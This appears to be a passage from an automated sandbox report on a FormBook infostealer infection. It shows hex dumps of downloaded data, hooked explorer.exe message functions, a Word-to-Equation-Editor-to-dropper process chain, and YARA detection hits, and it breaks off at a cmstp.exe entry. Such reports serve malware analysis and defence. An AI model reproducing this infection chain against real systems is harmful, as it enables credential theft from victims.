                                        Data Ascii: `0=P!5':v'bV(eYL+`7@j'b ZwQg{UM7,+ grVfoK<W6AlB=dI>LUlu[r8Gu;\zntwBo5A!#<?zK4Ttbuw1l7&Sb}."KHBGV)Hfj&#X|;iV"=*
                                        2023-11-21 12:25:58 UTC128INData Raw: ba 90 84 78 9d f3 d2 27 cb a5 a7 e7 6b 9e ab 46 83 ba ca 17 46 dd 43 d2 40 de f7 2f f8 8c 59 5d 02 c8 f6 99 7c ea cc 29 39 f2 06 77 c9 d0 dc 93 1d 21 7a 49 1a 64 27 2a e9 77 3f 5d 19 54 39 6e b1 aa e2 39 c1 85 10 84 48 e2 51 69 cd 8d b0 4d 0d 88 51 91 e9 c9 8a 63 e4 db 45 e2 d3 83 21 62 07 e2 b1 60 5b ec 79 4e 27 60 42 3f 7e 4f d8 56 42 7b c2 30 86 ac c3 42 6d 80 e7 d5 3a e8 a6 b8 2a 55 1e ac aa bb da 4f 1c 25 4a 6e ac 62 35 b4 da 50 51 d7 51 96 b5 32 ec 09 a9 13 29 31 90 e2 40 f5 0f d4 40 64 46 71 86 56 82 fb 55 08 2f 49 1d 42 e8 15 17 df 67 48 35 31 eb 13 f8 f5 51 5f ff 47 6d 70 e8 9f ee 02 1b 00 e9 ae 05 dd bd 01 3b 65 f6 d3 c1 0c e4 11 47 f6 b1 ce bf 83 b5 64 04 7e a0 1b b9 e2 ae c8 c5 16 ff 9c 88 5d 0d bb 8b 48 c8 1b ae 00 66 70 20 5c d3 81 e6 b9 76
                                        Data Ascii: x'kFFC@/Y]|)9w!zId'*w?]T9n9HQiMQcE!b`[yN'`B?~OVB{0Bm:*UO%Jnb5PQQ2)1@@dFqVU/IBgH51Q_Gmp;eGd~]Hfp \v
                                        2023-11-21 12:25:58 UTC144INData Raw: 06 f3 43 09 19 b3 d3 13 67 c3 81 bd 5b 43 c5 7f 74 6e 1c bc 3e 5e 74 b4 4a b9 45 0d aa 32 7f e7 31 c9 30 70 b4 34 8a fa cc 0a f7 3f f8 99 45 b5 63 64 f6 60 9e 9d 12 24 ab 81 b9 80 9b 92 e8 b4 e1 3f e0 ad 01 1c 0f 0a 7f f7 e6 d1 c0 3a 48 38 2a 7c c8 78 b9 a4 5f 0a 46 a1 08 2b bc 34 8e 0c d3 66 c2 36 91 66 6e 53 1a 6a 7d 21 96 7a 48 9f 18 62 40 19 1a 9b fa c1 f3 4b 8c c3 06 04 7e d9 4d da b3 0a 0b 39 32 b1 27 0a 70 50 d2 cf 60 96 14 f1 2d fa 5a a4 78 e6 1e 49 25 1d 87 36 8a 29 a4 fd 06 73 9a f2 6d 4e e1 e8 fb a2 30 ff 58 65 78 38 b9 49 68 ec a0 52 c7 4f 3c 63 ae a8 f8 94 d9 e0 97 b3 df 8a 14 f8 bf de ba f7 f4 98 34 c2 ea 6d c8 ab d8 ee 4f 86 84 ae 3a e2 b5 5f 2f 41 b9 92 31 29 98 76 8a 87 5d 28 1c e1 2b ed 38 ef 02 d8 dc fb 60 4f 05 64 01 ab 2a 9e 92 1a 05
                                        Data Ascii: Cg[Ctn>^tJE210p4?Ecd`$?:H8*|x_F+4f6fnSj}!zHb@K~M92'pP`-ZxI%6)smN0Xex8IhRO<c4mO:_/A1)v](+8`Od*
                                        2023-11-21 12:25:58 UTC160INData Raw: 6c 0a 1c 7e fc 0c 8c c6 6b 0b 8b a8 ea d6 3b d3 91 22 ba 9e bb ac 0e 26 ad 59 e5 f0 22 01 89 35 93 06 08 63 09 69 e3 30 34 17 16 e5 1b 27 ea 1f e0 06 ee 83 13 7f 54 cd 83 d4 76 e1 6b c0 97 59 3b ce 5e 02 e8 39 b8 74 d1 c2 ed 6c 8b ee 39 cc 63 f0 46 4e 90 f8 2c 92 fa 61 c8 ee 1a 17 a4 bf 00 93 4d 19 54 25 87 0e 3e c7 16 a6 c7 4a 64 9f c6 26 3b 4c 89 c5 a7 61 d2 5e ba d3 c1 e1 f8 fa 1a c6 05 12 a5 84 4f 88 58 6d ae b4 3d cd 27 5b 0a fd ed 44 ee fe 61 b5 fa 26 da 09 05 82 c4 40 0b 69 15 d3 34 97 11 ef 2f a3 c4 d4 40 80 b9 42 92 0b 9a 1c 81 99 09 0d 2c 69 01 e0 e3 18 35 c5 8a e6 3a 2c 7c 13 e9 05 25 34 d8 79 5e 8d 37 e1 b4 d8 66 5e 1e fb 20 ec 1a 80 d9 1e 8c 35 bd 91 9d d2 07 b1 9d 84 4c 99 56 cd 49 73 77 b4 e2 c4 9d d6 9c 9b ff 99 a3 c3 84 06 5e 54 ad e9 c6
                                        Data Ascii: l~k;"&Y"5ci04'TvkY;^9tl9cFN,aMT%>Jd&;La^OXm='[Da&@i4/@B,i5:,|%4y^7f^ 5LVIsw^T
                                        2023-11-21 12:25:59 UTC176INData Raw: 8b b1 b6 b8 7a f3 f8 58 26 66 41 46 8f 50 72 cf 4e 58 87 bd fb 3e da 01 20 96 5b 27 90 5c f8 20 4f e9 b5 11 ed c6 5e f7 6a 7a 89 5b 5f ff b3 b5 c9 40 4d 91 fb 49 fa 62 92 4b cc 41 0a 50 6e 0e 99 1d b7 73 50 8b 1e b3 bb 15 13 54 44 f0 1b ab 37 06 33 5b 06 da eb 13 16 53 9b ac a5 6d 88 cf 1a 9c e5 15 cd 2d b1 f9 64 fa ad 87 5a 9e ce 78 e1 82 ec ca 99 6c 65 97 45 86 8b 7b 66 80 5f 10 96 29 8f e6 56 45 84 38 e4 13 10 b7 41 58 db dd 90 a9 02 f3 67 db d0 e0 4a e8 da 81 96 6c b9 5c 11 82 75 b3 45 46 e3 25 8f 06 45 15 bb 84 2e fc 44 a7 d7 82 cc cd 28 7d c3 7f 63 9b af e9 7b 61 76 3f 35 a9 34 75 51 78 fb c4 41 3f 1b 4b 1d 13 79 b4 c9 4e 7a e6 43 ee 5c 3d 3c 79 1f 83 53 0c 71 52 2b 31 8d b3 bb 89 68 c5 77 86 12 43 e3 59 57 b6 34 05 e9 65 2e 8f 9d 5f 14 40 ed f3 14
                                        Data Ascii: zX&fAFPrNX> ['\ O^jz[_@MIbKAPnsPTD73[Sm-dZxleE{f_)VE8AXgJl\uEF%E.D(}c{av?54uQxA?KyNzC\=<ySqR+1hwCYW4e._@
                                        2023-11-21 12:25:59 UTC192INData Raw: 55 3a 38 9c ce 12 90 85 ff 57 4b 8a fe 69 91 a5 c4 68 90 bd c7 19 fd 4a dc 31 99 02 57 dd 4b 38 79 0f 43 b6 de 2d b8 27 31 b8 c3 74 4b 4b 83 9f 0b 55 3f 29 e5 18 21 9f 25 54 0c 4c f1 0e bd 36 37 1a c2 9a 5c 5f 27 fe 72 09 ab eb e1 f0 5f e7 eb d3 cd e8 e1 b3 23 3c dc f3 f2 8e 10 40 9a 62 6e 1a c9 8e 96 bf a8 a8 e6 12 56 65 2e 5b cc da d4 cb 3c 60 46 92 e4 2c 92 dd 50 35 5c a6 9c cc be 0c a0 e6 f7 18 1a 15 a5 86 53 ca 80 69 65 d9 8d eb 8e 6e 2a fb 93 99 19 9b 0e cc 6b 80 61 56 b4 f0 9f 08 55 3d de bc 55 e5 ae 9a e3 78 00 d6 56 f5 b5 dc ab 4b fd f7 89 ec 77 13 08 9d 34 31 c2 b7 8b 1c e1 5b 34 9f 19 aa 8a 2f c5 b1 d9 d9 e3 fd 17 1f 4b c7 a3 fa d8 20 0e ff c1 2f 7f b3 01 a1 06 5f 7d bd b1 e0 1c c7 44 30 b8 91 67 ec 7d 28 d6 4b 06 88 71 58 d7 59 e7 b7 77 c7 8f
                                        Data Ascii: U:8WKihJ1WK8yC-'1tKKU?)!%TL67\_'r_#<@bnVe.[<`F,P5\Sien*kaVU=UxVKw41[4/K /_}D0g}(KqXYw
                                        2023-11-21 12:25:59 UTC208INData Raw: 4c 1f f7 93 d0 5a d1 03 09 e8 4e 76 09 a0 12 bd d0 27 37 9e da f0 de 7d ca 82 8c cd 67 a5 b6 f2 a0 f7 75 58 66 ed 05 f6 1e e2 9c e6 c3 d1 7d e1 67 54 69 f2 36 68 27 b6 2b d8 3b df 38 d8 47 a7 14 b0 e3 f4 3f 89 cc 5f 59 85 19 d9 97 7d a4 c6 ac 32 5b 56 38 1e 62 cc b7 4a b4 71 e7 b5 96 ff c6 8f 8b 59 bd fa 16 22 32 3d 3d df 3c 45 76 85 b1 f0 0b e2 46 d8 16 30 f3 a2 f1 50 b8 d9 7a e5 64 89 95 6c 03 06 ac 55 e7 f9 b9 02 35 91 03 af ba 62 87 59 d3 9e 7c 92 5c 0a 98 ac dc 6d c4 b5 ed 01 cf e9 a0 16 d6 64 7e 4b 59 af 33 6a 81 4e 57 35 24 13 dd 11 52 f8 98 57 41 94 24 c2 be 42 6f f4 c8 a6 29 e4 db 7d 04 b7 a7 a2 7c f1 90 64 28 6d c2 6c 0d 5c 1e 2f 8a 0a c6 5d b5 59 7f b2 8c 5d a5 0c cf 7b 1e 6f 79 51 57 d4 3b cc be f5 a1 22 a1 d0 11 22 11 1b bc 1c 33 47 63 bd 2c
                                        Data Ascii: LZNv'7}guXf}gTi6h'+;8G?_Y}2[V8bJqY"2==<EvF0PzdlU5bY|\md~KY3jNW5$RWA$Bo)}|d(ml\/]Y]{oyQW;""3Gc,
                                        2023-11-21 12:25:59 UTC224INData Raw: 8e fc 0c 70 07 e7 1d 87 4c 8e d7 84 3c 61 95 45 3d 5f 06 6c b2 17 aa a3 b6 e7 60 7d 8d 70 fa 47 28 fe 67 26 f2 f0 34 8b 33 fc af ee 04 86 2a 0d 2f 57 3d dd ed 94 40 d2 2a 95 fb 88 ec 02 b1 25 8e 68 0b d5 13 5e af 7a c7 ad c1 8c 27 00 e9 83 9a b4 bc 8a f1 1e 8e 2a 85 9a 58 5c 12 6e a8 20 3d ef ce 24 a3 11 7e 6c df ff 70 a0 a2 9f 19 ac f5 e0 fb e0 60 0e b8 ee 1c 62 d5 6f 8b 49 04 70 d1 a7 db 18 2a ac d2 bf 43 1d 0e 18 e4 39 8a 7d 73 de ef 30 ee 0d f2 5c f1 35 50 0e 98 79 21 e5 8f 65 10 4b d7 9e b3 9c 5c 4d a0 cd 48 28 8b b9 f9 cc 91 98 f3 15 6d 48 19 d1 18 32 62 e3 b0 2a ce 1c 6d 28 45 a4 d4 b3 5d 87 3e 9e 7b bb 6d 0c 87 bf 6a 0a c9 7b d0 0c 08 29 bf 69 0f 9d b7 0e 51 90 c5 be 23 c0 d2 28 78 ff bc a0 ce 0d f0 49 2c 82 b6 4c b8 1d 23 50 24 f1 4b a5 42 49 a5
                                        Data Ascii: pL<aE=_l`}pG(g&43*/W=@*%h^z'*X\n =$~lp`boIp*C9}s0\5Py!eK\MH(mH2b*m(E]>{mj{)iQ#(xI,L#P$KBI
                                        2023-11-21 12:25:59 UTC240INData Raw: de 72 16 bc 5a e2 74 6d ea 12 2a 13 e5 e7 50 9a 28 34 dd 17 d1 e0 49 06 d5 b2 82 0d 1c dc ba 83 9a 5b 11 59 89 d8 5d 54 83 02 fc a0 42 4e e7 1f e1 45 5f c5 c8 22 df 62 6a 86 56 e3 b3 27 42 2a 8b 1d f4 3e c4 91 88 f2 26 f3 a0 58 90 c4 4c 73 b3 83 bd a3 f0 51 87 32 dd c2 ba 45 4b 76 63 28 01 7e 62 08 ca ff a3 3f 01 7c ef b2 42 78 29 e4 7b 8e e2 55 1d 68 55 81 f2 c4 f3 b1 19 66 1e a4 bd 36 10 96 fe de 34 02 c9 e6 38 61 a0 4e 2e bc 11 2a 24 53 94 b2 e4 89 c5 68 9b dd d6 fd 54 0b ff 8f 2e b2 9d 33 3b 93 cf 4b d7 0b 42 b6 50 36 80 ef d0 6e 2e ea 18 db 96 64 f8 f1 fb 08 3b 17 9d 65 b6 e2 64 22 de b3 d7 db 03 88 02 d3 61 9c 97 26 9d 39 63 ed 81 0f 08 3b b4 7f 96 54 60 b4 47 54 15 a9 7e a6 54 94 4a a1 0d 9b fb f2 f1 39 43 8f 3d ff 0b 69 57 d5 d9 5f 6e 33 3c 8f b9
                                        Data Ascii: rZtm*P(4I[Y]TBNE_"bjV'B*>&XLsQ2EKvc(~b?|Bx){UhUf648aN.*$ShT.3;KBP6n.d;ed"a&9c;T`GT~TJ9C=iW_n3<
                                        2023-11-21 12:25:59 UTC256INData Raw: 9c f7 e1 2a c1 bf 94 8d 91 20 a1 80 e2 d9 c0 43 1e ea 5d 73 7f 26 2d a6 f0 e0 f1 73 11 07 f1 5b 62 09 14 9c a2 1e a6 84 d0 ff fd 3e 6d a3 b7 e4 fe 36 bc 6e af ec ef 24 35 c2 08 b7 54 92 7a aa dd 21 46 13 b6 71 42 e5 17 5c 58 1d 6d 80 0f 93 d4 27 7e de 53 53 0a f5 5f bb 86 71 cd c4 f7 be 2b 29 ea 14 e4 3c 18 ff 1f 5b 6a 70 ab b1 e8 78 bf ba 42 22 86 82 14 b5 be 80 61 f5 ab 7d 93 55 c0 a7 d1 ee 26 cb 3b b7 bb a1 c2 7c dc a6 d7 a3 8b 16 83 f9 88 aa e6 75 c1 1d 57 7a 92 35 b6 f1 37 3c 01 94 8a ec 69 a9 58 7d 3b 11 88 dd 6c 52 6c 84 06 5a 21 bb 57 47 66 14 ed 69 79 66 c2 42 d2 de ef cc a4 e7 a1 13 af 9c 5a 50 a8 08 8c ca 0c 1d 2c 4e f6 ab b2 b2 95 86 df fb 38 d2 93 ca f9 69 de e2 16 11 7d a7 a4 d9 2f 02 c7 61 96 b9 3a ec d5 ba 53 13 c9 12 1a 04 85 ca 7f e8 9c
                                        Data Ascii: * C]s&-s[b>m6n$5Tz!FqB\Xm'~SS_q+)<[jpxB"a}U&;|uWz57<iX};lRlZ!WGfiyfBZP,N8i}/a:S
                                        2023-11-21 12:25:59 UTC272INData Raw: 71 a0 09 07 17 06 ff 53 35 e0 60 2f 41 e6 24 b0 68 51 ba 81 b3 ba 5a 6d 54 15 65 74 18 3a 6c ff 29 b0 78 54 29 29 47 8c 0c a9 81 ac a3 51 b7 34 f7 d3 d4 a7 25 20 d4 83 e9 fa a7 3c 27 2e c5 58 43 d5 24 5b ec c0 3c 95 40 60 b5 7d 58 2e 7b fb 81 ad ea 43 7c 88 6d 1a c2 08 15 32 d4 63 4e af 79 b5 6f 0f f7 76 b5 58 71 4e 9f 9b c7 cf 84 ac 24 56 46 d0 97 5e 2e 7f db 5d a0 4d a1 f3 81 30 e9 78 b0 83 da cf 06 b5 72 40 e1 74 80 d3 36 0c db 68 59 b9 25 e6 5d 6c 0b 0f 77 a2 79 c2 0c fa 0c f7 22 67 3b a7 8c 38 d4 7d e7 d1 16 6c d7 76 b6 32 37 6c a1 0d 8d d7 1f d7 25 fc 7c 94 54 58 62 16 4c ca 99 50 38 81 ad 8d 33 3a da 7b 87 61 82 14 0a 48 37 41 3a 15 f8 46 c5 06 4d e5 c9 09 36 a1 37 9c dc bd 7c 98 b8 bf 4b 10 c7 ea 5c 28 da b5 3d 00 58 8b 8e f5 8d 33 40 ab fe ef c3
                                        Data Ascii: qS5`/A$hQZmTet:l)xT))GQ4% <'.XC$[<@`}X.{C|m2cNyovXqN$VF^.]M0xr@t6hY%]lwy"g;8}lv27l%|TXbLP83:{aH7A:FM67|K\(=X3@
                                        2023-11-21 12:25:59 UTC288INData Raw: 28 79 66 77 bc 6d 73 c1 3d b1 80 d2 00 d5 41 6b ae 89 e9 26 23 a7 06 50 eb a7 6b f2 39 ef 91 34 42 01 e0 33 2f c5 ce 76 61 a9 c5 16 be 11 5f 39 e7 c4 72 4f f1 b7 25 91 0c f4 e2 34 e8 d0 e1 bc db 45 66 4f 81 67 63 37 c2 01 db e5 a8 9e 90 1b b7 7d 84 39 5e f3 b0 9a d3 1f 97 d5 eb 79 a5 33 3f 88 d0 1f 68 d7 23 65 2f de 37 4f 10 ff 1b 06 6f b0 75 4e 39 53 59 9c 53 74 1b 56 79 85 ab cf 87 f3 b4 f1 2a ce b8 79 6b 66 b7 fa 39 4d 2a 3e 43 eb 7d 55 71 3c 0d 22 ae 4d 71 a9 48 3a 26 b9 9e 35 3c 6e 2d 7c 25 0b 1f 2c 99 1e 30 56 74 12 5a 55 0f 97 79 04 39 a7 59 59 99 78 e9 20 d2 69 8b dd 7b c0 5f 5d 78 b8 ce 83 16 a8 9d 19 4d fe 4c b9 ea fb 4e bd 42 cc d4 16 ba 4e ad 1c 8a 63 68 52 22 17 3a f7 5b 15 43 ed ce cc 11 77 63 4e b5 8a e2 7c 13 d1 f2 69 76 8c c1 84 6c bb 5e
                                        Data Ascii: (yfwms=Ak&#Pk94B3/va_9rO%4EfOgc7}9^y3?h#e/7OouN9SYStVy*ykf9M*>C}Uq<"MqH:&5<n-|%,0VtZUy9YYx i{_]xMLNBNchR":[CwcN|ivl^
                                        2023-11-21 12:25:59 UTC304INData Raw: 9e 75 15 14 8f 99 58 0c be d2 85 ad e3 57 61 f2 ce c8 53 b7 ea 07 d8 4e 66 fb a1 2a 50 e5 6d 11 a4 39 18 20 5b f2 ac 10 15 c9 c5 73 66 c4 fe 08 57 c7 b8 67 14 87 ac 9b ac 6c eb d6 92 e8 a8 43 b8 e9 d4 ef dc 98 44 77 74 61 a6 f2 29 c6 af a8 14 ad d1 1f 38 cc b9 7d 95 e3 9e 53 04 61 b4 ff ef 9d a8 9c 40 c9 72 ab 05 14 12 d0 af 50 c0 ad d2 1f 49 db 0b c3 e2 e7 8a 5f 46 28 1c 27 76 c6 b0 86 a5 f7 e0 14 95 86 e2 39 ae a5 8f e3 f5 c9 50 ea fe 0d 0d e9 1a 71 1c a0 0a df 7f 09 18 4b ad 8a 0a a1 3d cb 4c e8 bb 8b c0 81 d7 c6 60 f0 ba a1 96 d8 b7 d1 ba a2 6c 62 05 c4 50 1c a4 4d c5 b0 47 ae 3c c3 a4 75 6e 17 e8 50 a7 f1 16 93 51 14 f0 c3 b6 5c 41 3a 78 da 85 a2 ea d4 82 d6 e7 cb 22 fa 0f 35 34 ed 3e 68 90 15 c1 69 0f eb 3f d4 39 b2 b8 7a 3b 75 3c a3 08 08 81 82 e6
                                        Data Ascii: uXWaSNf*Pm9 [sfWglCDwta)8}Sa@rPI_F('v9PqK=L`lbPMG<unPQ\A:x"54>hi?9z;u<
                                        2023-11-21 12:25:59 UTC320INData Raw: 52 18 a8 03 38 98 f2 c4 65 74 9c 51 68 70 59 ea da 01 ec ba a0 58 9a 86 79 e9 09 d9 70 1f bf bf f1 35 7e d9 26 cf 54 b1 25 ca 94 2d 14 a7 cc 50 7f a7 b7 63 13 f5 14 16 16 f1 f3 e0 e7 07 c5 f7 4e 50 89 6a 4f 30 50 01 1e a8 9d ce 9b 05 23 97 94 bb 04 d8 ae 2e 95 a6 5e 18 d9 7a d4 19 ee 43 70 f5 a9 2b 09 a8 8d bb 74 13 fe 75 47 90 31 e5 f5 ab 36 77 ad b3 f5 0e 07 d7 8b c4 15 75 97 e6 00 e0 b9 d9 dd 7e f4 71 6a 92 63 91 29 c2 a1 71 c0 3f 24 30 9a 58 7f aa 5b 29 61 76 ae 5b 8f df d1 70 6a 32 e8 6e 66 8f 83 98 c3 62 35 df 3b 78 5c be 2e 18 fc b9 ca 2e 10 33 9f da 3f ef d1 2d 6c 0e 50 ad 12 03 91 b7 0f 08 d7 75 19 be ab ee fd 03 1e 8e ee d0 df 70 e3 be 65 f3 90 7f 0a 20 79 f1 66 61 ba a6 24 93 ca ed e7 73 6e 34 d4 26 65 55 2f d3 ae 13 af b6 3e e4 43 42 d1 23 53
                                        Data Ascii: R8etQhpYXyp5~&T%-PcNPjO0P#.^zCp+tuG16wu~qjc)q?$0X[)av[pj2nfb5;x\..3?-lPupe yfa$sn4&eU/>CB#S
                                        2023-11-21 12:25:59 UTC336INData Raw: 40 6f d1 09 e6 0a 84 5a 24 b8 47 3a 38 59 38 05 c2 13 4b d4 29 0e 85 21 d2 ea 64 6e 6c cf 23 6d 0f f3 5b 03 55 ae 11 07 07 50 aa f4 79 a0 87 0c 12 ba 81 c1 e7 72 5a c5 8a 59 23 9f 99 80 b6 ae ec 8a c7 ac 26 01 f9 26 5b 56 79 9d b8 cc 2b 53 46 7a f3 b6 2a 00 7e 73 db 44 eb 8d 48 bf 8f 58 9c 86 9f ac ab 23 96 2a 99 b5 c4 29 b3 86 b2 31 62 4d 3e a6 ae bd 24 2e bc 15 95 dd 3f f8 b2 75 53 66 20 23 b4 70 79 b5 c5 97 50 2f e7 a9 0d 11 da da 52 7e 42 d9 44 61 08 1a 4f 1b 16 58 67 0c 4d 39 60 a1 d2 ea c0 ec 22 9d 8e 09 2c 01 9e e8 be 56 bc 81 2a 2d 83 71 a2 67 6c 07 a8 08 01 b8 09 26 c8 94 88 17 2f 9f 0d 93 fe e6 88 ef c6 f0 d7 a6 b9 1d ff 32 34 a7 41 70 99 50 9a 1b 43 df 32 60 e1 27 b9 ec 84 d5 d7 0f 0c 48 e7 d2 77 e9 de 5b db 51 73 85 31 0d 80 ff 40 c2 50 13 2c
                                        Data Ascii: @oZ$G:8Y8K)!dnl#m[UPyrZY#&&[Vy+SFz*~sDHX#*)1bM>$.?uSf #pyP/R~BDaOXgM9`",V*-qgl&/24ApPC2`'Hw[Qs1@P,


                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function NameHook TypeActive in Processes
                                        PeekMessageAINLINEexplorer.exe
                                        PeekMessageWINLINEexplorer.exe
                                        GetMessageWINLINEexplorer.exe
                                        GetMessageAINLINEexplorer.exe

                                        Processes

                                        Process: explorer.exe, Module: USER32.dll
                                        Function NameHook TypeNew Data
                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xEF
                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xEF
                                        GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xEF
                                        GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xEF

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:13:25:51
                                        Start date:21/11/2023
                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                        Imagebase:0x13f930000
                                        File size:1'423'704 bytes
                                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:2
                                        Start time:13:25:52
                                        Start date:21/11/2023
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543'304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:13:25:57
                                        Start date:21/11/2023
                                        Path:C:\Users\user\AppData\Roaming\word.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\word.exe
                                        Imagebase:0x400000
                                        File size:345'522 bytes
                                        MD5 hash:B08C02AB269D1406728178E62017C3D4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:13:25:57
                                        Start date:21/11/2023
                                        Path:C:\Users\user\AppData\Local\Temp\twbcaze.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\Temp\twbcaze.exe"
                                        Imagebase:0x400000
                                        File size:203'776 bytes
                                        MD5 hash:9C416E56B341D900E2DFEC7595CC85EE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:13:25:58
                                        Start date:21/11/2023
                                        Path:C:\Users\user\AppData\Local\Temp\twbcaze.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\twbcaze.exe
                                        Imagebase:0x400000
                                        File size:203'776 bytes
                                        MD5 hash:9C416E56B341D900E2DFEC7595CC85EE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:13:25:58
                                        Start date:21/11/2023
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0xff2f0000
                                        File size:3'229'696 bytes
                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000008.00000002.881171114.0000000008CBE000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:9
                                        Start time:13:26:00
                                        Start date:21/11/2023
                                        Path:C:\Windows\SysWOW64\cmstp.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\cmstp.exe
                                        Imagebase:0xd0000
                                        File size:84'992 bytes
